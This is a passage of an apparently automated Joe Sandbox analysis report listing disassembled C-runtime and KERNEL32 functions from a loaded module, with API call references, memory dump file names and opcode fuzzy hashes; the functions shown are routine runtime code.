                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _get_osfhandle.MSVCR100(00000002), ref: 6FD95AC2
                                                                                                          • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6FD95ACB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDAF4BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1012986785-0
                                                                                                          • Opcode ID: e184ede185016d17f3df0247b8c3987c599a5ba4dc28a29e7c7643f00349195a
                                                                                                          • Instruction ID: b9d1cfc54a20dc7d10697a12a52359eeecc0235da85e232651f311864e88bc2c
                                                                                                          • Opcode Fuzzy Hash: e184ede185016d17f3df0247b8c3987c599a5ba4dc28a29e7c7643f00349195a
                                                                                                          • Instruction Fuzzy Hash: BD116B32014B50FAD782537C9806B9A37949F83B78F150257E8748B1D1EF71F8818268
                                                                                                          Function 6FD8A90B Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A96F
                                                                                                          • _lock.MSVCR100(0000000A,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A981
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A998
                                                                                                          • _errno.MSVCR100(6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FDA74B9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 957642387-0
                                                                                                          • Opcode ID: 8bfe969367506f5d97eb1a4f2edd533d680aa7b1495d9da362a0d98ffc80dc0d
                                                                                                          • Instruction ID: 3a132034996c3f0e776c2cb1a1bd45aab912ebf73892d3140b728e57614eeca4
                                                                                                          • Opcode Fuzzy Hash: 8bfe969367506f5d97eb1a4f2edd533d680aa7b1495d9da362a0d98ffc80dc0d
                                                                                                          • Instruction Fuzzy Hash: A611A331549382FEEB907FB4D844A6C7BB06F82768F52552ED1B1AB1C0CFB474819B25
                                                                                                          Function 6FDFCFC3 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCFD0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCFDB
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCFEC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCFF7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 0d059a2bd31ca99bdf186298c3ed28f0c4287a1da24065283c17fdf984dcd2b5
                                                                                                          • Instruction ID: 090342a59e59c1430c79f9f53931338d96d7f75f1c2c8829fa8a8526bd633b7b
                                                                                                          • Opcode Fuzzy Hash: 0d059a2bd31ca99bdf186298c3ed28f0c4287a1da24065283c17fdf984dcd2b5
                                                                                                          • Instruction Fuzzy Hash: 5A11AC7150220AEBCF902FA4D880D8A7766EF40399F12002AFE515A140DB31B553EAB1
                                                                                                          Function 6FDFCF2F Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCF3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCF47
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCF58
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCF63
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 6d056a4e88e1fb9190caef913492ab2527ce1ef6280bceb4dc50830bf1ec0456
                                                                                                          • Instruction ID: 2a8d8308fe1af28d1caec68ff27e80f27ed4e270e4ca8b719c1a4d607679ceff
                                                                                                          • Opcode Fuzzy Hash: 6d056a4e88e1fb9190caef913492ab2527ce1ef6280bceb4dc50830bf1ec0456
                                                                                                          • Instruction Fuzzy Hash: 5F11E57650730ADFCF905FA4DC80C8AF775EF413B8B22022AE9555A150CB31F662D6B1
                                                                                                          Function 6FD8EC6D Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FD8EB19
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB02EE
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB02F6
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB030C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB0317
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB031E
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB0329
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8EB64: _isatty.MSVCR100(?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FD8EBF3
                                                                                                            • Part of subcall function 6FD8EB64: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE), ref: 6FD8EC24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                                                                                          • String ID:
                                                                                                          • API String ID: 3635451409-0
                                                                                                          • Opcode ID: 4c9b3b51aa1e7b25cd66750136790fceaedfeed74a50b894177f478118d0c5bc
                                                                                                          • Instruction ID: 055c30969a1117aaf009f6b11809549fad3cc3b745f0ada48eef718ed3657128
                                                                                                          • Opcode Fuzzy Hash: 4c9b3b51aa1e7b25cd66750136790fceaedfeed74a50b894177f478118d0c5bc
                                                                                                          • Instruction Fuzzy Hash: 4811BF71841345DFD791AFA4CE8876C3760AF02369F055649D4329B1E1EBB8B9408FB1
                                                                                                          Function 6FDFA9C9 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFA9DD
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFA9E5
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA04
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA0C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA17
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA66
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: da43709c7dda86c165317d755a56977d700603b54c91990c9fd4baa61ef567ca
                                                                                                          • Instruction ID: ea7e6c944bc3418ab3e72f4dbed5a795e81ffcacea51fc2b899f713952b20839
                                                                                                          • Opcode Fuzzy Hash: da43709c7dda86c165317d755a56977d700603b54c91990c9fd4baa61ef567ca
                                                                                                          • Instruction Fuzzy Hash: 8111BC71842349DFE791AFB8CA80B6D37A0AF02329F178251D4305F1D1DBB8BA468B71
                                                                                                          Function 6FDFA22C Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA244
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA24C
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA26B
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA273
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA27E
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA2C5
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA2D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 8443d23d43efd5996ac8f716503869233d6e7bebd20e7b516d787bfd858f993b
                                                                                                          • Instruction ID: 59ceee9841b9c87075a2a1096bb3edb21b4c1c31317bf498cbe5e42b408665fb
                                                                                                          • Opcode Fuzzy Hash: 8443d23d43efd5996ac8f716503869233d6e7bebd20e7b516d787bfd858f993b
                                                                                                          • Instruction Fuzzy Hash: E2118831A42745CEE790AFA8C984B6C37A0AF02339F126245D0309B1D1DBB9B9429B71
                                                                                                          Function 6FDFBDEE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000D,6FDFBEB0,00000008), ref: 6FDFBE07
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 6FDFBE19
                                                                                                          • free.MSVCR100(?), ref: 6FDFBE2E
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • _lock.MSVCR100(0000000C,6FDFBEB0,00000008), ref: 6FDFBE47
                                                                                                          • free.MSVCR100(?,6FDFBEB0,00000008), ref: 6FDFBE8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lockfree$CriticalDecrementEnterFreeHeapInterlockedSection
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 3981277889-2441139153
                                                                                                          • Opcode ID: 4b60a1e3c567996fceec3e5fab2a65e68154be7fc0b7abfcf78dd11a9dcce70b
                                                                                                          • Instruction ID: 7b7fde785e9d147141a7ad4cab7fb35edbfd96ac78486f9cdb5655317ee5a593
                                                                                                          • Opcode Fuzzy Hash: 4b60a1e3c567996fceec3e5fab2a65e68154be7fc0b7abfcf78dd11a9dcce70b
                                                                                                          • Instruction Fuzzy Hash: F911A131503702EAEBA49F749804F4E77E4AF00768F21450AE1BADB0D0DB76F9818B20
                                                                                                          Function 6FDDA988 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA993
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA99E
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _sopen_s.MSVCR100(00000000,00000000,00008002,00000040,00000000), ref: 6FDDA9B8
                                                                                                          • _futime64.MSVCR100(00000000,?), ref: 6FDDA9CC
                                                                                                          • _errno.MSVCR100 ref: 6FDDA9DA
                                                                                                          • _close.MSVCR100(00000000), ref: 6FDDA9E9
                                                                                                          • _errno.MSVCR100 ref: 6FDDA9F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_close_futime64_invalid_parameter_invalid_parameter_noinfo_sopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 4114205011-0
                                                                                                          • Opcode ID: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                          • Instruction ID: cf4a0395473dd4648837ee6ad3bebca5d288a293abe06718bf009da2eef5a287
                                                                                                          • Opcode Fuzzy Hash: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                          • Instruction Fuzzy Hash: 0B016232505308FADB402FA9DC05B893B659F81778F52C211FA289F1D1DB31BA8197A1
                                                                                                          Function 6FDD9ED3 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD9EDE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD9EE9
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _sopen_s.MSVCR100(00000000,00000000,00008002,00000040,00000000), ref: 6FDD9F03
                                                                                                          • _futime32.MSVCR100(00000000,?), ref: 6FDD9F17
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F25
                                                                                                          • _close.MSVCR100(00000000), ref: 6FDD9F34
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F3F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_close_futime32_invalid_parameter_invalid_parameter_noinfo_sopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 69840952-0
                                                                                                          • Opcode ID: ece3f39c6dd8f952d1eb5727fbec9b4eb7987178d3b1ac12a92b746cf500ff57
                                                                                                          • Instruction ID: 52a6b36f2b21169f5d237d4acae41c6cc341342f8f2e7ca56d0990d3af9241ef
                                                                                                          • Opcode Fuzzy Hash: ece3f39c6dd8f952d1eb5727fbec9b4eb7987178d3b1ac12a92b746cf500ff57
                                                                                                          • Instruction Fuzzy Hash: E1016232605308FADB801FB5DC45F893B659F817B8F119251FA285F1D0DB32F98197A1
                                                                                                          Function 6FDCEB60 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB79
                                                                                                          • _errno.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB84
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB8F
                                                                                                          • _lock.MSVCR100(00000007,6FDCEC00,00000018), ref: 6FDCEB9B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,6FDCEC00,00000018), ref: 6FDCEBBD
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCEBCD
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCEBD4
                                                                                                            • Part of subcall function 6FD8AABF: __doserrno.MSVCR100(?,?,6FDF8605,00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FD8AAC5
                                                                                                            • Part of subcall function 6FD8AABF: _errno.MSVCR100(?,?,6FDF8605,00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FD8AAD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CurrentDirectoryErrorLast_dosmaperr_invalid_parameter_noinfo_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2898266085-0
                                                                                                          • Opcode ID: dbb328dad9653927e6af7aa94cbfde2031225571feed8e9748c0d4952c41a877
                                                                                                          • Instruction ID: 9d2a0b9e0cfcecaf519c934bcae4985750237e5efc81db4f7826dcce8b040f57
                                                                                                          • Opcode Fuzzy Hash: dbb328dad9653927e6af7aa94cbfde2031225571feed8e9748c0d4952c41a877
                                                                                                          • Instruction Fuzzy Hash: C101CCB280030896EB90ABB4C80A79D77B5BF05368F152246D025BB1D0DB78B9408B72
                                                                                                          Function 6FD81E9B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FD81F38,00000008,6FDA75E9,00000000,00000000), ref: 6FD81EAC
                                                                                                          • _lock.MSVCR100(0000000D), ref: 6FD81EE0
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81EED
                                                                                                            • Part of subcall function 6FD81E4E: _unlock.MSVCR100(0000000D,6FD81EFF), ref: 6FD81E50
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD81F01
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                                                                                          • String ID: KERNEL32.DLL$Jo
                                                                                                          • API String ID: 2973837600-3261423612
                                                                                                          • Opcode ID: bbdbbd578c5c81ff0209c2cad4e022d8885b901a569afdf4278a9c7ab883191e
                                                                                                          • Instruction ID: ff007786cd762797faf53120d67b261fcf1bc2fed48b3e906106ddb50ed4f1ff
                                                                                                          • Opcode Fuzzy Hash: bbdbbd578c5c81ff0209c2cad4e022d8885b901a569afdf4278a9c7ab883191e
                                                                                                          • Instruction Fuzzy Hash: 04018071505B40DBE7619F65C805749FBE0BF41324F208A4ED4B6972E0CBB4B648CF25
                                                                                                          Function 6FDB8BD4 Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BF0
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDB8BF3
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BFA
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BFD
                                                                                                          • GetLastError.KERNEL32(?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C07
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C1F
                                                                                                          • _CxxThrowException.MSVCR100(6FE20C48,6FE20C48,00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C2D
